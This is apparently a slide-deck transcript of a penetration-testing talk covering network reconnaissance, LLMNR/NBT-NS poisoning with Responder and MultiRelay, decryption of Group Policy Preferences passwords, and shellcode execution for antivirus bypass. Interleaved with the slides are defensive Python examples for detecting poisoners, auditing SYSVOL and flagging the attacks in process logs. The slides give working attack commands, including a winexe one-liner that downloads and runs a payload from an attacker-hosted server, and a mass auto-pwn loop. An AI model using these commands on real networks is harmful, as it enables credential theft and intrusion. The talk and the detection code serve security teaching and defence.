3. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
* Disclaimer *
• Slides in English but I’ll speak in Portuguese.
• This presentation doesn’t have any tool created or invented by me, only how I use "well known" tools and how I can automate their use...
• In this presentation I’ll only talk about ideas and tricks that I personally use during internal penetration test engagements.
4. whoami
• a.k.a. Pimps
• CTF Player (web and crypto)
• Proud Member of TheGoonies CTF Team
  • Check our writeups at: https://thegoonies.rocks
• Penetration Tester (+7 years)
  • Tempest, Cipher, SpiderLabs and Securus Global
• Previous Presentations
  • Black Hat SP, BSides LV, Ekoparty, Thotcon, AlligatorCon, YSTS…
22/11/16 4
5. Scenario we will talk about
• Internal Penetration Testing
• 100% Black Box (Plug and Play)
• Time constraint (3-5 days)
• Without “low-hanging fruits”
• Anti-virus and some other protections in place
6. Agenda
• Unfortunately we have only 40 minutes, so I chose:
  • Reconnaissance Tricks on Blackbox Testing
  • LLMNR and NBT-NS Poisoning
  • GPOs / GPPs
  • Shellcode Execution - SCE
7. RECONNAISSANCE TRICKS ON BLACKBOX TESTING
8. Domain Computer Accounts
• First enumerate all Domain Controllers:
  • nslookup
  • ping domain_name
  • dsquery
  • Etc…
• Use enum4linux to enumerate all users on the domain (if null session is enabled or using a cred).
• Extract all machine usernames (accounts whose username ends with $, like: user$).
• Nmap all those userX$.domain_name to get their IP addresses and open ports. Repeat the nmap process in all different subnets.
9. Identifying “Live Subnets”
• You don’t need to scan all IPs to identify live subnets…
• Scan well-known IP addresses with well-known ports to identify live addresses in subnets:
  • x.x.x.1, x.x.x.101, x.x.x.192, x.x.x.201, x.x.x.253, x.x.x.254
  • Scan common ports: 21, 22, 23, 25, 53, 80, 443, 445, 3389
10. Identifying “Live Hosts”
• Once you find a subnet with a live IP, scan the whole subnet with a tuned nmap command:
  • nmap -A -T4 -n --top-ports 1000 --max-rtt-timeout=500ms --initial-rtt-timeout=200ms --min-rtt-timeout=200ms --open --stats-every 5s x.x.x.0/24
12. LLMNR and NBT-NS Poisoning
• The victim machine wants to go to the print server at printserver, but mistakenly types in pintserver.
• The DNS server responds to the victim saying that it doesn’t know that host.
• The victim then asks if there is anyone on the local network that knows the location of pintserver.
• The attacker responds to the victim saying that he actually is the pintserver.
• The victim believes the attacker and sends its own username and NTLMv2 hash to the attacker.
• The attacker can now crack the hash to discover the password.
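The exchange above, turned into a defender's canary probe as an added example (not from the talk, nor from Responder): it builds the LLMNR A query a host multicasts after DNS has failed, parses any reply, and treats any answer for a name nobody on the network legitimately owns as evidence of a poisoner on the segment. The multicast group and port are RFC 4795's; the canary name, the transaction id 0x1234 and the 10.0.0.66 reply are constructed.

```python
import os, socket, struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355      # LLMNR multicast group/port (RFC 4795)

def build_llmnr_query(name, txid=None):
    # The A query a Windows host multicasts once DNS has answered "unknown host".
    txid = struct.unpack("!H", os.urandom(2))[0] if txid is None else txid
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)            # flags 0 = query, QDCOUNT 1
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)                 # QTYPE A, QCLASS IN

def _read_name(data, off):                        # DNS-style name, with 0xC0xx compression pointers
    labels = []
    while (ln := data[off]) != 0:
        if ln & 0xC0 == 0xC0:
            ptr = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            return ".".join(labels + [_read_name(data, ptr)[0]]), off + 2
        labels.append(data[off + 1:off + 1 + ln].decode()); off += 1 + ln
    return ".".join(labels), off + 1

def parse_llmnr_response(data):                   # -> (txid, [(name, ipv4), ...]); [] unless QR bit set
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if not flags & 0x8000:
        return txid, []
    off = 12
    for _ in range(qd):
        off = _read_name(data, off)[1] + 4        # skip the echoed question (name + type + class)
    answers = []
    for _ in range(an):
        name, off = _read_name(data, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        if rtype == 1 and rdlen == 4:
            answers.append((name, socket.inet_ntoa(data[off + 10:off + 14])))
        off += 10 + rdlen
    return txid, answers

def probe_for_poisoner(name="llmnr-canary-host", timeout=2.0):
    # Ask the LAN for a name nobody legitimately owns: any reply at all is a poisoner.
    q = build_llmnr_query(name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(q, (LLMNR_GROUP, LLMNR_PORT))
        try:
            data, (src, _) = s.recvfrom(512)
        except socket.timeout:
            return None                           # silence: nobody answered the canary
    return {"poisoner": src, "answers": parse_llmnr_response(data)[1]}

# Constructed reply a poisoner would send for the "pintserver" typo (txid 0x1234, claims 10.0.0.66).
SAMPLE_POISONED_REPLY = (struct.pack("!HHHHHH", 0x1234, 0x8000, 1, 1, 0, 0) + b"\x0apintserver\x00"
    + struct.pack("!HH", 1, 1) + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton("10.0.0.66"))
```

Run probe_for_poisoner() periodically from a host on the segment; a healthy network returns None every time.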
14. Responder by @lgandx
https://github.com/lgandx/Responder
• Performs LLMNR/NBT-NS/mDNS poisoning in an easy and highly effective way and stores the captured hashes and clear-text credentials into files.
• Pre-requisites: Install Python
  • git clone https://github.com/lgandx/Responder.git
  • cd Responder
  • ./Responder.py -I eth0 -rPv
• Use john or hashcat to crack the captured NTLMv2 hashes via dictionary attack… If you don’t have a good wordlist you can use rockyou.txt. Works well for me on most occasions...
15. DEMO Responder by @lgandx
https://www.youtube.com/watch?v=mgAHX4h1ojI
16. Responder + Proxenet by @hugsy
https://proxenet.readthedocs.io/en/dev/mitm/
• Use Responder to spoof NetBIOS packets and poison the WPAD configuration of Windows workstations on the local network, redirecting their traffic to our evil box.
• Add the plugin oPhishPoison.py to the autoload directory of proxenet and start it:
  • ln -sf proxenet-plugins/oPhishPoison.py proxenet-plugins/autoload/oPhishPoison.py
  • ./proxenet -b YOUR_IP -p 8008 -i -N
• From the moment proxenet and Responder are configured and running, fake LLMNR and WPAD responses will be sent to the victims. By default, the loaded plugin will replace known binary content types (such as Office documents, ZIP files, RAR archives, etc.) with PE executables containing your payloads.
• Please visit the link for detailed configuration.
17. DEMO Responder + Proxenet by @hugsy
https://www.youtube.com/watch?v=eN_HwFkyYyw
19. Responder + MultiRelay
http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html
• MultiRelay was built to work in conjunction with Responder.py; the common usage scenario is:
  • Set SMB and HTTP to Off in Responder.conf
  • ./Responder.py -I eth0 -rv (on one screen)
  • ./tools/MultiRelay.py -t Target_IP -u Administrator/Daaccount/OtherAdmin/ALL (on another screen)
20. Responder + MultiRelay
• Once a relay has been successful, MultiRelay will give you an interactive shell allowing you to:
  • Remotely dump the LM and NT hashes on the target (that you can pass-the-hash after)
  • Remotely dump any registry keys under HKLM (sensitive information and configurations)
  • Read any file on the target.
  • Download any file on the target.
  • Execute any command as System on the target.
21. MultiRelay DEMO by @lgandx
https://www.youtube.com/watch?v=c5GT9pAtnIw
22. GPO – GROUP POLICY OBJECT
GPP – GROUP POLICY PREFERENCES
23. Group Policies (GPO)
• SYSVOL is a share present on the Domain Controllers to which all authenticated users have read access.
• SYSVOL contains logon scripts, group policy data, and other domain-wide data which needs to be available anywhere.
• All domain Group Policies are stored here:
  • \\<DOMAIN_CONTROLLER>\SYSVOL\<DOMAIN_NAME>\Policies
24. Clear-text Credentials on SYSVOL
25. Group Policy Preferences (GPP)
• In 2006, Microsoft bought Desktop Standard’s “PolicyMaker”, which they re-branded and released with Windows Server 2008 as “Group Policy Preferences.”
• One of the most useful features of Group Policy Preferences (GPP) is the ability to store and use credentials in several scenarios (change local admin password, configure printers, configure shares, configure services, etc.).
• Those credentials are stored encrypted. They are encrypted with AES-256, which should be good enough… But…
26. Thanks Microsoft ;-*
https://msdn.microsoft.com/en-us/library/cc422924.aspx
27. Decrypting GPP cpassword
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
root@kali:~# gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Local*P4ssword!
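A defender-side audit for the GPP issue in slides 25 to 27, added here as an example that is not from the talk, from PowerSploit or from gpp-decrypt: it walks a SYSVOL Policies tree, parses the preference XML files that can carry a cpassword attribute and reports every non-empty one together with its GPO GUID and the account it belongs to, which is exactly what has to be rotated and removed. The GPO GUID and the XML fragments are constructed; the cpassword value is the one from the slide above.

```python
import os, re, tempfile
import xml.etree.ElementTree as ET

# Preference files that can carry a cpassword attribute (well-known GPP file names).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml", "DataSources.xml", "Drives.xml", "Printers.xml"}
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")   # whichever the file type uses
GPO_GUID = re.compile(r"\{[0-9A-Fa-f-]{36}\}")

def find_cpasswords(policies_root):
    """Walk a SYSVOL Policies tree and report every non-empty cpassword it finds."""
    hits = []
    for dirpath, _, files in os.walk(policies_root):
        for fn in files:
            if fn not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fn)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue                                         # malformed file: skip, not crash
            for el in root.iter():
                cp = el.attrib.get("cpassword", "")
                if not cp:
                    continue                                     # empty cpassword = no stored secret
                m = GPO_GUID.search(path)
                account = next((el.attrib[a] for a in ACCOUNT_ATTRS if a in el.attrib), "?")
                hits.append({"gpo": m.group(0) if m else "?", "file": fn, "element": el.tag,
                             "account": account, "cpassword_len": len(cp)})
    return hits

def build_sample_sysvol():
    """Constructed SYSVOL Policies fragment for a stand-alone run (not a real domain)."""
    root = tempfile.mkdtemp()
    gpo = os.path.join(root, "{11111111-2222-3333-4444-555555555555}", "Machine", "Preferences")
    os.makedirs(os.path.join(gpo, "Groups")); os.makedirs(os.path.join(gpo, "Services"))
    with open(os.path.join(gpo, "Groups", "Groups.xml"), "w") as f:       # cpassword from the slide above
        f.write('<Groups><User name="LocalAdmin"><Properties action="U" userName="LocalAdmin" '
                'cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"/></User></Groups>')
    with open(os.path.join(gpo, "Services", "Services.xml"), "w") as f:   # empty cpassword: benign
        f.write('<NTServices><NTService name="svc"><Properties accountName="LocalSystem" '
                'cpassword=""/></NTService></NTServices>')
    return root
```

Point find_cpasswords() at a mounted \\DC\SYSVOL\domain\Policies to run it for real; every hit is a credential any domain user can read.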
30. Shellcode Execution - SCE
• HIGHLY EFFECTIVE for anti-virus bypass
• My own experience: worked perfectly 100% of the times that I needed to use it.
• Works beautifully using winexe or psexec (God bless the Pass the Hash :-P)
• With a Domain Admin account it is possible to automate the mass p0wn4g3 on the network by “scripting” the command and reading the targets from a list.
• Using a Meterpreter script you can also automate the capture of evidence on all compromised machines (screenshot, ifconfig, hashdump, mimikatz, getinfo, etc…)
31. Shellcode Execution - SCE
• Using Microsoft PowerShell it is possible to download the binary (wget style) to a temporary directory, execute it and erase the file afterwards:
  • On the Attacker machine execute: python -m SimpleHTTPServer
  • This will serve http://YOUR_MACHINE:8000/ from the Attacker machine
  • winexe --user=DOMAIN/USER%HASH_OR_PASSWORD //TARGET "cmd /c "del teste.bat & echo powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE:8000/sce.32.exe','sce.32.exe')" >> teste.bat & echo powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE:8000/hack.bat','hack.bat')" >> teste.bat & echo hack.bat >> teste.bat & teste.bat""
32. SCEPWN-NG by @joshuaskorich
https://github.com/joshuaskorich/scepwn-ng
• Using a samba share you can execute the binary directly from the shared folder, injecting the meterpreter session directly into memory without any file ever touching the disk!
• Details of how to configure the environment are on the scepwn-ng GitHub page.
• After configuring your environment and getting a privileged account, just execute:
  • ./scepwn-ng.rb -u 'username%password_or_hash' -t TARGET
• If you put this command in a loop to read from a list of targets and use a Meterpreter script to automate commands on the targets, it becomes a mass auto-pwn tool.
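Detection logic for the delivery chains in slides 31 and 32, added here as an example that is not from the talk, from winexe or from scepwn-ng: a handful of rules over Sysmon-style process-creation fields (ParentImage, Image, CommandLine) flag a child of the psexec/winexe service binary, the PowerShell WebClient download, the echo-into-a-batch-file-then-run pattern, a download from a bare IP:port origin (what python -m SimpleHTTPServer produces) and a binary executed straight from a UNC share. The events, hosts and the 10.0.0.5 address are constructed.

```python
import re

REMOTE_EXEC_SERVICES = {"psexesvc.exe", "winexesvc.exe"}   # service binaries psexec/winexe drop on the target

def classify(event):
    """Return the rule names one process-creation event (Sysmon EID 1 style fields) matches."""
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    image = event["Image"].lower()
    exe = image.rsplit("\\", 1)[-1]
    cmd = event["CommandLine"].lower()
    hits = []
    if parent in REMOTE_EXEC_SERVICES:
        hits.append("child_of_remote_exec_service")              # winexe/psexec lateral movement
    if exe == "powershell.exe" and "webclient" in cmd and "downloadfile" in cmd:
        hits.append("powershell_webclient_download")             # the wget-style fetch from slide 31
    if exe == "cmd.exe" and re.search(r"echo .*>>\s*\S+\.bat.*&\s*\S+\.bat", cmd):
        hits.append("cmd_builds_then_runs_batch")                # echo ... >> teste.bat & teste.bat
    if re.search(r"https?://\d{1,3}(?:\.\d{1,3}){3}:\d+/", cmd):
        hits.append("download_from_bare_ip_and_port")            # SimpleHTTPServer-style origin
    if image.startswith("\\\\"):
        hits.append("image_executed_from_unc_share")             # scepwn-ng style run-from-share
    return hits

def scan(events):
    """Return [(index, [rules...])] for every event that matched at least one rule."""
    return [(i, r) for i, r in ((i, classify(e)) for i, e in enumerate(events)) if r]

# Constructed sample events; hosts, paths and the 10.0.0.5 address are made up for this example.
SAMPLE_EVENTS = [
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Program Files\\Chrome\\chrome.exe",
     "CommandLine": "\"chrome.exe\" --profile-directory=Default"},
    {"ParentImage": "C:\\Windows\\PSEXESVC.exe", "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c \"del teste.bat & echo powershell -c \"(new-object System.Net.WebClient)"
                    ".DownloadFile('http://10.0.0.5:8000/sce.32.exe','sce.32.exe')\" >> teste.bat & teste.bat\""},
    {"ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -c (new-object System.Net.WebClient).DownloadFile("
                    "'http://10.0.0.5:8000/sce.32.exe','sce.32.exe')"},
    {"ParentImage": "C:\\Windows\\winexesvc.exe", "Image": "\\\\10.0.0.5\\share\\sce.32.exe",
     "CommandLine": "\\\\10.0.0.5\\share\\sce.32.exe"},
]
```

Any single rule is noisy on its own; two or more on one host within a few seconds is the pattern the slides describe.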